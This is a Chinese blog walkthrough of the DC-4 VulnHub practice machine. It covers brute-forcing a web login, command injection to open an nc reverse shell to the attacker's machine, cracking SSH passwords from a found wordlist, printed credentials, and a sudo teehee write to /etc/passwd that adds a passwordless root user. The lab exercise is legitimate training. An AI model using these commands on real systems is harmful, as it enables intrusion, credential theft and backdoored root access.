DC4靶机

最新推荐文章于 2024-11-08 21:10:59 发布
最新推荐文章于 2024-11-08 21:10:59 发布
阅读量161 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77132421/article/details/129998173
版权
本文描述了一次网络安全演练过程,首先通过Nmap扫描并确定靶机IP,然后利用BurpSuite进行密码爆破,成功获取登录。接着通过反弹shell和命令执行进一步渗透,发现并利用sudo提权,在系统中创建免密root用户,最终找到flag。
摘要由CSDN通过智能技术生成

第一步确定靶机和kali在同一网络模式下

确定自己的ip地址:192.168.91.129

 nmap 尝试扫描靶机的ip:192.168.91.1228 

 拿到靶机ip第一步就是去浏览器访问80端口的http服务

 是一个登录页面

开启bp,输入常用用户admin和超强弱密码123456.抓个包看看

 直接丢到intruder去

 给和密码加上&准备爆破

 开始爆破

 爆破到密码为happy

 用admin:hayyp登录页面

 成功进入,点击command继续深入

 点击command,可以看到可以选择任意一个命令执行

 抓个包看看

 那是不是可以将ls -l换成一个反弹shell呢,先在kali开启监听

将ls+-l改成nc -e /bin/sh 192.168.91.129 8888,点击forward放行。

 反弹成功

 进来后先交互一下

 在家目录下发现三个用户

 在jim里有三个文件

 找到了一个存放密码的文件

 将所有密码拷贝,粘贴到kali的root目录下

 对jim用户进行密码爆破,字典就用刚才找到的1.txt

 成功爆破到密码

 ssh远程登录

jim:jibril04

 登录成功,但是登录的时候它多出来一句话,可以翻译下看看

进过查找, 在var目录发现mail,打开jim的邮件看看

 又找到了一个用户和密码

 Charles:^xHhA&hvim0y

既然找到了,那就进去看看

 成功进入,但是进的时候要注意把用户大写的C换成小写

find / -perm -4000 -print 2>/dev/null 查看提权方式

可以用sudo提权

利用teehee的root权限在passwd中写入一个免密的root权限用户

echo "love::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

成功进入

 寻找flag

 

小龙0
关注
课设之跨网段攻击
qq_51558360的博客
06-26 1772
网段攻击
一起来打靶 01
cmdos的专栏
03-21 788
0x00 靶机介绍靶机地址:BoredHackerBlog: Social Network ~ VulnHub靶机难度:中推荐虚拟机:VirtualBox0x01 内容简介涉及的攻击方法主机发现端口扫描服务发现路径爬取代码注入Shell脚本内网信息收集内网穿透漏洞利用密码破解本地提权攻击代码修改0x02 环境搭建下载好靶机.ova文件后导入到VirtualBox中即可确保靶机kali同一网段kali IP地址:10.0.2.50x03 信息收集因为靶机kali同一网段中,所以优先选择二层的主机发现
kali扫不到靶机ip的解决办法
weixin_52963334的博客
08-08 3402
扫不到靶机ip
两个虚拟机之间可互相ping通且都能上网
qq_41509200的博客
09-08 7755
两个虚拟机之间可互相ping通且都能上网 背景 折磨我两周的东西今天终于搞定了,心理无限激动,写个博客纪念一下!!! 具体操作 把kali的设置中网络的网卡1的连接方式设置成桥接网卡,其他的选项不要动 靶机的设置中网络的网卡1的连接方式设置成桥接网卡,其他的选项也不要动 这样进入kali和虚拟机之后会发现两者拥有不同的IP地址(在同一网段),而且之间可以互相ping通,还能ping通www....
关于DC-4靶机的实战
PigLL的博客
08-15 336
实验环境 一台DC-4靶机 一台kali攻击机 同是NAT模式 使DC-4和kali同一网段 1.信息收集 首先确定kali的IP地址 利用nmap扫描同网段网址 因为192.168.137.130为kali的IP 所以192.168.137.137为DC-4的IP 通过对DC-4的扫描发现22端口和80端口是开放的 通过网页访问192.168.137.137 发现登陆页面 利用抓包工具抓包 然后将抓到的包发送到intruder模块 第一个字典添加admin 信息 第二个字典找一个爆破字典
DC-4靶机
mlws1900的博客
03-24 1269
下载不下来用迅雷下载。
DC4靶机练习
LSYZWF的博客
04-23 401
文章目录1、查看靶机的mac地址2、打开网页发现了需要密账号和密码进行登录3、用户名admin,密码:happy进行登录4、ssh爆破5、登录成功后,查看相关文件6、提权 实验环境:DC-4靶机kali攻击机 靶机: 链接:https://pan.baidu.com/s/1naWHuZDDwWOI2zqO6vG6OA 提取码:rkzw 1、查看靶机的mac地址 扫描C段网络 nmap -sP 192.168.246.130/24 -o nmap.sP 发现目标主机的ip地址为192.168.246
DC4靶机渗透测试
Huangshanyoumu的博客
04-16 713
文章目录环境版本:一、信息收集1.主机发现2.端口扫描二、漏洞挖掘1.访问目标 ip,查看内容2.使用 BP 进行爆破密码3.使用密码登陆4.使用 BP 查看执行命令流量包5.替换命令来使用 nc 建立连接7.使用 nc 将靶机文件传输到攻击机8.使用 hydra 爆破 ssh 密码9.ssh 登陆,进行信息收集10.提权 描述:从靶机DC-3开始,只有一个入口和一个最终的flag, 只有拿到root权限才可以发现最终的flag,DC-4也是一样 环境版本: VMware pro 16 Kali 202
DC-4靶机通关
qq_63831588的博客
07-23 1171
teehee提权,bp爆破
dc-4靶机练习.docx
01-02
靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有...
DC-4靶机提权超详细过程
02-29
### DC-4靶机提权超详细过程 #### 一、前言 本文将详细介绍如何在DC-4靶机上进行权限提升的过程,包括利用Kali Linux进行初始渗透测试、爆破登录凭证、获取敏感信息以及最终实现权限提升的具体步骤。通过本教程,...
【vulnhub】---DC-4靶机
qq_43168364的博客
08-21 2017
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:DC-4靶机(192.168.15.152) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗透步骤 渗透思路 ......
Vulnhub靶机:DC-4渗透详细过程
IerkeU的博客
02-28 2007
基本步骤 前言提要: 靶场地址:DC: 4 ~ VulnHub DC-4是一个初中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 这次练习的靶机是vulnhub平台下的DC系列靶机第四台,该靶机的难度系数为简单,拿下该靶机的关键就是需要收集信息,最终目的是获取root权限,拿到flag。 步骤: 信息收集 nmap 192.168.132.0/24 目标靶机ip:192.168.132.150 全面扫描 n
vulnhub靶机DC-4 渗透笔记
liver100day的博客
06-09 2199
DC-4 靶机渗透 靶机环境搭建 攻击渗透机: kali IP地址:192.168.75.128 靶机:DC-3 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/dc-4,313/ 渗透过程 1.信息收集 1.1 主机发现 arp-scan -l 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) 确认目标靶机IP地址:192.168.75.148 1.2 端口扫描 确认了IP地址,接下来我们就使用端口扫描神器来扫描目标靶机开放的端口 nmap -T4 -
关于Flutter空安全升级方案整理
清风洒脱
11-08 920
Flutter 从 2.0 版本开始支持空安全(Null Safety)。升级到空安全后,由于语法的变动,基本上整个工程,代码都爆红,这对项目来说简直是灾难性的打击,不升级的话只是缓兵之计,因为随着时间的推移,flutter将不再维护非空安全的版本,同时一些三方库也将无法使用,因此空安全升级变成了一个不得不做的事情,项目越复杂需要的时间也就越持久,考虑到对项目的稳定性,和开发周期。选择一个合适自己项目的迁移方案非常重要。下面自己会讲下自己对空安全迁移的理解和实施方案,目前成功迁移几个项目,还是比较有经验的。
微软日志丢失事件敲响安全警钟
juminfo的博客
11-08 437
据报告,从9月2日至9月19日,持续长达两周的时间里,微软的多项核心云服务,包括身份验证平台Microsoft Entra、安全信息与事件管理(SIEM)平台Sentinel、云安全解决方案Defender for Cloud以及数据目录服务Purview,都经历了安全日志记录的空白期。系统可以实时、不间断地收集并整合各类设备的日志信息,通过先进的关联分析技术和机器学习手段,助力用户从庞杂的日志数据中快速识别异常安全事件,全面满足合规审计、分析调查及数据留存等多日志场景使用需求。
信息安全工程师(82)操作系统安全概述
m0_73399576的博客
11-08 1287
信息安全工程师——操作系统安全概述篇
【AI写作宝-注册安全分析报告-无验证方式导致安全隐患】
最新发布
11-08 667
AI写作宝是一款基于人工智能技术的在线写作辅助工具,由合肥风平网络信息科技有限公司开发。它旨在帮助用户提升写作效率,通过AI技术自动生成文章、文案、作文等,适用于多种写作场景。该网站好像属于灰色地带的业务, 网站介绍什么的都没有,更容易被黑客攻击, 好像对短信被盗刷的安全方面不够重视 ,测试结果就是随便你怎么攻击都可以,这也有点太开放了, 短信验证码难道不要钱吗?这对黑客来说肯定是好消息, 弄个简单的脚本就可以搞定很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“
shodan 【2】(泷羽sec)
m0_68984471的博客
11-08 892
shodan的使用方法
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值